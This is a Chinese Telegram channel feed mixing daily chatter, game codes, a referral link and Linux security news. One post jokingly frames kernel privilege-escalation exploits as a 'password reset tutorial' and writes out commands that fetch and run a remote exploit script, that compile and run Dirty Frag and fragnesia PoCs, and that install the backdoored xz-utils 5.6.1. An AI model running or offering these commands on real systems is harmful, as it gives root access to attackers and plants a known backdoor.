来自 @GamerNoTitle 的各种动态的发布频道(各种发癫日常),群聊在 @DohnaNyan,私聊请发送至 @PaffCreamPMBot

内群 https://t.me/+pk-inutwlK0wMTdl

嫌频道太吵可以开免打扰,本频道会不定时发一些日常也好新闻也好,反正就是很杂(指日常发电)

Github: @GamerNoTitle
Twitter: @GamerNoTitle
Website: https://bili33.top
#羊毛 前 1,000 名注册用户将获得 1,000 美元的额外推理积分 + 对前沿模型(包括 Opus 4.6,最高每月 15,000 美元)的 2.5 倍成本补贴,为期一年。
https://hyperagent.com/refer/4RUQMS3X (需要信用卡验证)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp | python3 && su
passwd root
设置你的新密码

2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh

4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可

5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
#日常 还真是,昨天发现了
我的是设置上限 80% 的,之前充到 80 都还是橙色,更新以后变绿了
#日常 原来我是领导😎
#终 赤石科技
2026 Linux 重置密码教程大全
(支持除最新版本内核

- Dirty Cow (CVE-2016-5195)
- io_uring UAF (CVE-2022-2602)
- Copy Fail (CVE-2026-31431)
- io_uring ZCRX freelist (CVE-2026-43121)
- Dirty Frag (CVE-2026-43284 CVE-2026-43500)

免费运维服务(专业黑客团队)
- xz utils 5.6.0-5.6.1 (CVE-2024-3094)

#MaintainerGuide
#原 #兑换码
「月之七」前瞻兑换码
虚空劫灰往世书 - 原石x100 大武器矿x10
大天使尼古拉可可 - 原石x100 大经验书x5
骑士洛恩向您致意 - 原石x100 摩拉x50k
Linux 内核现严重本地提权漏洞,全主流发行版暂无补丁

一名安全研究人员本周公开披露了一个被命名为”Dirty Frag”的 Linux 内核本地权限提升漏洞。该漏洞允许普通用户无需密码即可获得系统最高权限(root),且目前 Ubuntu、RHEL、Fedora、openSUSE 等全部主流发行版均尚无可用补丁。

该漏洞由韩国安全研究员 Hyunwoo Kim(网名 @ v4bel)发现并报告。POC 已于 2026 年 5 月 7 日在 GitHub 公开,任何人均可通过单行命令完成编译并执行。

漏洞源自脏写入了零拷贝路径,由两个独立模块链式组合后构成。具体可参考:
Dirty Frag 属于与 Dirty Pipe(CVE-2022-0847)和 Copy Fail 相同的漏洞类——零拷贝发送路径上,splice()将攻击者只有读权限的 page cache 页直接钉入 struct sk_buff 的 frag 槽,而接收侧内核代码对该 frag 执行原地(in-place)加密/解密,导致只读 page cache 被写入。

其一利用 IPsec ESP 模块(存在约 9 年,自 2017 年起受影响),可将 /usr/bin/su 替换为恶意程序,需要创建用户命名空间的权限;其二利用 RxRPC 协议模块(自 2023 年起受影响),可清空 /etc/passwd 中 root 的密码字段,完全无需任何特殊权限。两个变体互相覆盖对方的限制,使得单一攻击程序可在几乎所有主流 Linux 发行版上通用。

上游 Linux 内核已于 5 月 7 日合并了针对 ESP 模块的修复补丁,但 RxRPC 模块的补丁尚未合并。由于协调披露期间遭第三方抢先公开,各发行版未能按计划准备 backport,导致当前所有发行版内核均处于无补丁状态,CVE 编号亦尚未分配。
被破坏的披露流程:
2026-04-29/30:作者向 security@kernel.org 提交漏洞和补丁
2026-05-07:作者向 linux-distros 提交,设定 5 天 embargo
2026-05-07 同日:不相关的第三方将 exploit 公开至互联网,embargo 被打破
2026-05-07:作者与发行版维护者协商后,决定全面公开 Dirty Frag 文档


官方建议的缓解措施:
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
> /etc/modprobe.d/dirtyfrag.conf

此操作对不使用 IPsec 或 AFS 的普通服务器无功能影响。

GitHub

🌸 在花频道 · 茶馆讨论 · 投稿通道
#日常 每次看到 jvav 这一坨嵌套就烦唉唉
怎么还要考这科啊(◍•﹏•)
#终 #日常 五一把鸣潮和终末地的剧情推到最新了
终末地武陵这剧情比四号谷地的剧情好太多了,观感也舒服很多
你怎么知道我庄方宜一潜了 :>
Back to Top